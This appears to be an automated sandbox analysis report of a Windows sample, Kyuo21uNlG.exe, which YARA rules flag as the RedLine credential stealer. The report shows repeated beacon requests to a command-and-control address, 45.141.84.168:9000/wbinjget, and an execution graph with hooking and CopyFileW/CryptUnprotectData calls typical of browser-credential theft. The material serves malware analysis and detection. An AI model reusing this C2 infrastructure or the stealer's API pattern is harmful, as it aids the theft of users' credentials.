                                          Nov 28, 2024 13:42:45.157887936 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:46.560594082 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:46 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          129192.168.2.44999045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:46.800224066 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:48.164293051 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:47 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          130192.168.2.44999145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:48.392738104 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:49.749741077 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:49 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          131192.168.2.44999245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:49.985001087 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:51.341288090 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:51 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          132192.168.2.44999345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:51.580086946 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:52.938110113 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:52 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          133192.168.2.44999445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:53.176563025 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:54.541564941 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:54 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          134192.168.2.44999545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:54.768074036 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:56.123882055 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:55 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          135192.168.2.44999645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:56.359778881 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:42:57.715801001 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:57 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          136192.168.2.44999745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:57.940396070 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:42:59.342669964 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:59 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          137192.168.2.44999845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:59.581099987 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:43:00.893780947 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:43:00 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          138192.168.2.44999945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:43:01.128571033 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:43:02.486619949 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:43:02 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          139192.168.2.45000045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:43:02.857616901 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:43:04.168354988 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:43:03 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          140192.168.2.45000145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:43:04.392117977 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:43:05.797054052 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:43:04 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          141192.168.2.45000245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:43:06.032672882 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:43:07.343090057 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:43:06 GMT
                                          Connection: close


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Target ID:0
                                          Start time:07:39:01
                                          Start date:28/11/2024
                                          Path:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Kyuo21uNlG.exe"
                                          Imagebase:0x420000
                                          File size:786'944 bytes
                                          MD5 hash:2B209F07C6251E367835FBF30E7C348E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:15.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:19.4%
                                            Total number of Nodes:124
                                            Total number of Limit Nodes:10
                                            execution_graph 49365 6871315 49366 6871346 49365->49366 49372 6872984 49366->49372 49376 68729b8 49366->49376 49367 68719dc KiUserExceptionDispatcher 49369 6871b71 49367->49369 49373 687298f 49372->49373 49374 6872a4a LdrInitializeThunk 49373->49374 49375 6872a2c 49373->49375 49374->49375 49375->49367 49377 68729df 49376->49377 49378 6872a4a LdrInitializeThunk 49377->49378 49379 6872a2c 49377->49379 49378->49379 49379->49367 49458 6a2d910 49459 6a2d927 49458->49459 49464 6a2d9a0 49459->49464 49470 6a2da99 49459->49470 49474 6a2d991 49459->49474 49460 6a2d945 49465 6a2d9c4 49464->49465 49467 6a2da43 49465->49467 49480 6a22260 49465->49480 49468 6a2daaf 49467->49468 49469 6a22260 SetWindowsHookExW 49467->49469 49469->49467 49471 6a2da43 49470->49471 49471->49470 49472 6a2daaf 49471->49472 49473 6a22260 SetWindowsHookExW 49471->49473 49473->49471 49475 6a2d9a0 49474->49475 49476 6a22260 SetWindowsHookExW 49475->49476 49477 6a2da43 49475->49477 49476->49477 49478 6a2daaf 49477->49478 49479 6a22260 SetWindowsHookExW 49477->49479 49479->49477 49481 6a2e680 SetWindowsHookExW 49480->49481 49483 6a2e70a 49481->49483 49483->49467 49399 71a84f0 49400 71a8558 CreateWindowExW 49399->49400 49402 71a8614 49400->49402 49403 abd580 49404 abd598 49403->49404 49405 abd5f2 49404->49405 49410 71a93f9 49404->49410 49418 71a86a8 49404->49418 49422 71a8698 49404->49422 49426 71a6394 49404->49426 49413 71a93fb 49410->49413 49411 71a9469 49415 71a9467 49411->49415 49444 71a64bc 49411->49444 49413->49411 49414 71a9459 49413->49414 49434 71a9590 49414->49434 49439 71a9580 49414->49439 49419 71a86ce 49418->49419 49420 71a6394 CallWindowProcW 49419->49420 49421 71a86ef 49420->49421 49421->49405 49423 71a86a8 49422->49423 49424 71a6394 CallWindowProcW 49423->49424 49425 71a86ef 49424->49425 49425->49405 49427 71a639f 49426->49427 49428 71a9469 49427->49428 49430 71a9459 49427->49430 49429 71a64bc CallWindowProcW 49428->49429 49431 71a9467 49428->49431 49429->49431 49432 71a9590 CallWindowProcW 49430->49432 49433 71a9580 CallWindowProcW 49430->49433 49432->49431 49433->49431 49436 71a95a4 49434->49436 49435 71a9630 49435->49415 49448 71a9638 49436->49448 49452 71a9648 49436->49452 49441 71a9590 49439->49441 49440 71a9630 49440->49415 49442 71a9638 CallWindowProcW 49441->49442 49443 71a9648 CallWindowProcW 49441->49443 49442->49440 49443->49440 49445 71a64c7 49444->49445 49446 71aab4a CallWindowProcW 49445->49446 49447 71aaaf9 49445->49447 49446->49447 49447->49415 49449 71a9648 49448->49449 49450 71a9659 49449->49450 49455 71aaa80 49449->49455 49450->49435 49453 71a9659 49452->49453 49454 71aaa80 CallWindowProcW 49452->49454 49453->49435 49454->49453 49456 71a64bc CallWindowProcW 49455->49456 49457 71aaa9a 49456->49457 49457->49450 49380 6872d18 49381 6872d48 49380->49381 49385 6872f98 49381->49385 49390 6872fa8 49381->49390 49382 6872d94 49386 6872fa8 49385->49386 49387 6872ff2 49386->49387 49395 68730ef 49386->49395 49387->49382 49388 6872fcc 49388->49382 49391 6872fbb 49390->49391 49392 6872ff2 49391->49392 49394 68730ef KiUserCallbackDispatcher 49391->49394 49392->49382 49393 6872fcc 49393->49382 49394->49393 49396 68731a6 49395->49396 49397 6873112 49395->49397 49396->49388 49397->49396 49398 6873183 KiUserCallbackDispatcher 49397->49398 49398->49396 49484 6874838 49485 687485f 49484->49485 49486 6874971 49485->49486 49489 687a630 49485->49489 49495 687a620 49485->49495 49490 687a657 49489->49490 49491 687a6f2 49490->49491 49501 687e366 49490->49501 49506 687a870 49490->49506 49511 687a860 49490->49511 49491->49485 49496 687a630 49495->49496 49497 687a6f2 49496->49497 49498 687e366 2 API calls 49496->49498 49499 687a860 2 API calls 49496->49499 49500 687a870 2 API calls 49496->49500 49497->49485 49498->49497 49499->49497 49500->49497 49503 687a9e7 49501->49503 49502 687e350 49503->49502 49504 687f6d1 CopyFileW CryptUnprotectData 49503->49504 49505 687f6e0 CopyFileW CryptUnprotectData 49503->49505 49504->49503 49505->49503 49508 687a89e 49506->49508 49507 687e350 49508->49507 49509 687f6d1 CopyFileW CryptUnprotectData 49508->49509 49510 687f6e0 CopyFileW CryptUnprotectData 49508->49510 49509->49508 49510->49508 49513 687a861 49511->49513 49512 687e350 49513->49512 49514 687f6e0 CopyFileW CryptUnprotectData 49513->49514 49515 687f6d1 CopyFileW CryptUnprotectData 49513->49515 49514->49513 49515->49513

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 69e1c08-69e1c1f 1 69e1c27-69e1c3a 0->1 3 69e1c3c-69e1c3e 1->3 4 69e1c43-69e1c52 1->4 5 69e1df9-69e1e00 3->5 7 69e1c6b-69e1c7a 4->7 8 69e1c54-69e1c66 4->8 11 69e1c7c-69e1c8e 7->11 12 69e1c93-69e1cc7 7->12 8->5 11->5 16 69e1ccd-69e1ccf 12->16 17 69e1db9-69e1de3 12->17 18 69e1d65-69e1d8f 16->18 19 69e1cd5-69e1cff 16->19 28 69e1de5-69e1df7 17->28 29 69e1e01-69e1e89 17->29 18->17 31 69e1d91-69e1db7 18->31 32 69e1d1a-69e1d44 19->32 33 69e1d01-69e1d15 19->33 28->5 50 69e1e8f 29->50 51 69e1e8b-69e1e8d 29->51 31->5 32->18 44 69e1d46-69e1d60 32->44 33->5 44->5 52 69e1e92-69e1ea5 50->52 51->52 54 69e1fa7-69e1fbf 52->54 56 69e1eaa-69e1eb0 54->56 57 69e1fc5-69e1fd2 54->57 58 69e1ebc-69e1ec6 56->58 59 69e1eb2 56->59 61 69e1ec8-69e1ed0 58->61 62 69e1ef0-69e1efa 58->62 59->58 63 69e1ed6-69e1ede 61->63 64 69e1fd3-69e2042 61->64 68 69e1efc-69e1eff 62->68 69 69e1f01-69e1f06 62->69 66 69e1ee5-69e1eea 63->66 67 69e1ee0-69e1ee3 63->67 88 69e204e-69e2052 64->88 89 69e2044-69e204c 64->89 72 69e1eee 66->72 67->66 71 69e1eec 67->71 68->69 73 69e1f08 68->73 74 69e1f0a-69e1f0c 69->74 71->72 72->74 73->74 76 69e1f0e-69e1f14 74->76 77 69e1f7a-69e1f80 74->77 79 69e1f16 76->79 80 69e1f20-69e1f27 76->80 81 69e1f8c-69e1f97 77->81 82 69e1f82 77->82 79->80 80->77 83 69e1f29-69e1f2f 80->83 81->54 82->81 85 69e1f3b-69e1f42 83->85 86 69e1f31 83->86 85->77 90 69e1f44-69e1f4a 85->90 86->85 91 69e2057-69e205c 88->91 89->91 92 69e1f4c 90->92 93 69e1f56-69e1f5d 90->93 95 69e205e-69e2063 91->95 96 69e2065-69e206e 91->96 92->93 93->77 94 69e1f5f-69e1f65 93->94 98 69e1f67 94->98 99 69e1f71-69e1f78 94->99 97 69e2071-69e2073 95->97 96->97 101 69e2079-69e207e 97->101 102 69e2220-69e224a 97->102 98->99 99->77 100 69e1f99-69e1fa0 99->100 100->57 103 69e1fa2-69e1fa5 100->103 104 69e2162-69e217b 101->104 131 69e2251-69e2291 102->131 103->57 107 69e217d-69e218d 104->107 108 69e21c4-69e21c8 104->108 110 69e218f-69e2197 107->110 111 69e2199-69e219d 107->111 112 69e21ce-69e21de 108->112 113 69e2298-69e22c2 108->113 114 69e21a2-69e21a7 110->114 111->114 116 69e21ea-69e21ee 112->116 117 69e21e0-69e21e8 112->117 132 69e22c9-69e23c6 113->132 118 69e21a9-69e21ae 114->118 119 69e21b0-69e21b9 114->119 121 69e21f3-69e21f8 116->121 117->121 122 69e21bc-69e21be 118->122 119->122 124 69e21fa-69e21ff 121->124 125 69e2201-69e220a 121->125 122->108 126 69e2083-69e208a 122->126 128 69e220d-69e220f 124->128 125->128 129 69e208f-69e20c6 126->129 130 69e208c 126->130 128->132 133 69e2215-69e221f 128->133 145 69e20c8-69e20d0 129->145 146 69e20d2-69e20d6 129->146 130->129 131->113 148 69e20db-69e20e0 145->148 146->148 150 69e20e6 148->150 151 69e20e2-69e20e4 148->151 152 69e20e9-69e20eb 150->152 151->152 152->108 155 69e20f1-69e2108 152->155 156 69e210a-69e2116 155->156 157 69e2118-69e2135 155->157 159 69e2139-69e2145 156->159 157->159 160 69e214e-69e2157 159->160 161 69e2147-69e214c 159->161 163 69e215a-69e215c 160->163 161->163 163->104 163->131
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$Hbq$Hbq$Hbq$Hbq$LR^q$Pl^q$c^q
                                            • API String ID: 0-333207869
                                            • Opcode ID: 29d172da8c61e90a1fdbfc0647201be829c1afa1316084c48574be68eddb8dfe
                                            • Instruction ID: c179418bb684e4b3859646e90e9a157c1a75ddecde16cf0da3fbfb031ae14856
                                            • Opcode Fuzzy Hash: 29d172da8c61e90a1fdbfc0647201be829c1afa1316084c48574be68eddb8dfe
                                            • Instruction Fuzzy Hash: 2E22B330B002158FDB5A9BB9C4502BEBBE6FF89300F248469E406DB795EB39DE45C791
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *JL6$:hW`$@^#$I0=$S3.$WG#`
                                            • API String ID: 0-3669199882
                                            • Opcode ID: 637f1b3c30f4fe8f78819b5418a2c25f7e081b9ab917718b6e352d94439cfe76
                                            • Instruction ID: 7167415bb05117b6e11bf58ec0d608d296239121b23aee5509f61f326bd9e12d
                                            • Opcode Fuzzy Hash: 637f1b3c30f4fe8f78819b5418a2c25f7e081b9ab917718b6e352d94439cfe76
                                            • Instruction Fuzzy Hash: 6203E374A0521ACFCB54CF68D884A9EBBF5FB49304F14C6AAD819E7355E730AA85CF40

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 475 6a273f8-6a27418 476 6a2741a 475->476 477 6a2741f-6a274db 475->477 476->477 483 6a274e2-6a27524 477->483 484 6a274dd 477->484 487 6a27526 483->487 488 6a2752b-6a27563 483->488 484->483 487->488 490 6a27565 488->490 491 6a2756a-6a27592 488->491 490->491 493 6a27bfe-6a27c0a 491->493 494 6a27c10-6a27c1b 493->494 495 6a27597-6a275a3 493->495 496 6a27c23-6a27c41 494->496 497 6a27c1d-6a27c1e 494->497 498 6a275a5 495->498 499 6a275aa-6a275c4 495->499 503 6a27c43-6a27c4f 496->503 504 6a27c50 496->504 497->495 498->499 500 6a275c6 499->500 501 6a275cb-6a27605 499->501 500->501 507 6a27632-6a27671 501->507 508 6a27607-6a27626 501->508 503->504 525 6a27673 507->525 526 6a27678-6a276b1 507->526 509 6a27925-6a27937 508->509 510 6a2762c-6a2762d 508->510 511 6a27939 509->511 512 6a2793e-6a27974 509->512 513 6a276e0-6a276e7 510->513 511->512 522 6a27976 512->522 523 6a2797b-6a279c3 512->523 515 6a27711 513->515 516 6a276e9-6a276f5 513->516 521 6a27717-6a27731 515->521 518 6a276f7-6a276fd 516->518 519 6a276ff-6a27705 516->519 524 6a2770f 518->524 519->524 527 6a27733-6a2773c 521->527 528 6a27741-6a27780 521->528 522->523 538 6a27b91-6a27bac 523->538 539 6a279c9-6a279eb 523->539 524->521 525->526 550 6a276b3 526->550 551 6a276b8-6a276c5 526->551 529 6a27810-6a27817 527->529 552 6a27782 528->552 553 6a27787-6a277c0 528->553 530 6a27841 529->530 531 6a27819-6a27825 529->531 537 6a27847-6a2785e 530->537 535 6a27827-6a2782d 531->535 536 6a2782f-6a27835 531->536 540 6a2783f 535->540 536->540 542 6a27860 537->542 543 6a27865-6a2789e 537->543 547 6a27b90 538->547 548 6a27bae-6a27bcc 538->548 545 6a279f2-6a27a83 539->545 546 6a279ed 539->546 540->537 542->543 543->507 559 6a278a4-6a278b1 543->559 564 6a27a85 545->564 565 6a27a8a-6a27aee 545->565 546->545 547->538 554 6a27bdb 548->554 555 6a27bce-6a27bda 548->555 550->551 558 6a276ce-6a276da 551->558 552->553 569 6a277c2 553->569 570 6a277c7-6a277d4 553->570 554->493 555->554 558->513 559->507 563 6a278b7-6a278bc 559->563 563->538 566 6a278c2-6a278d6 563->566 564->565 579 6a27af0 565->579 580 6a27af5-6a27b37 565->580 566->507 568 6a278dc-6a278ee 566->568 572 6a278f0 568->572 573 6a278f5-6a2791f 568->573 569->570 574 6a277dd-6a27809 570->574 572->573 573->509 573->547 574->508 576 6a2780f 574->576 576->529 579->580 583 6a27b39 580->583 584 6a27b3e-6a27b8d 580->584 583->584 584->538 587 6a27b8f 584->587 587->547
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fv$h$$^q$$^q$$^q$$^q
                                            • API String ID: 0-1218197988
                                            • Opcode ID: 2eff2f19c85326937ecf0279f3a7b70690bdefcbe5249907fe77844f07d05f43
                                            • Instruction ID: 5d69c3972ec67b8967e955a455f0c37e66f1ac7fa06a7f64baea7d2cf94955d6
                                            • Opcode Fuzzy Hash: 2eff2f19c85326937ecf0279f3a7b70690bdefcbe5249907fe77844f07d05f43
                                            • Instruction Fuzzy Hash: 1132B274E41229CFDB64DF6DC984B9DBBB2BF48300F14C2A5E409AB255DB34AA85CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
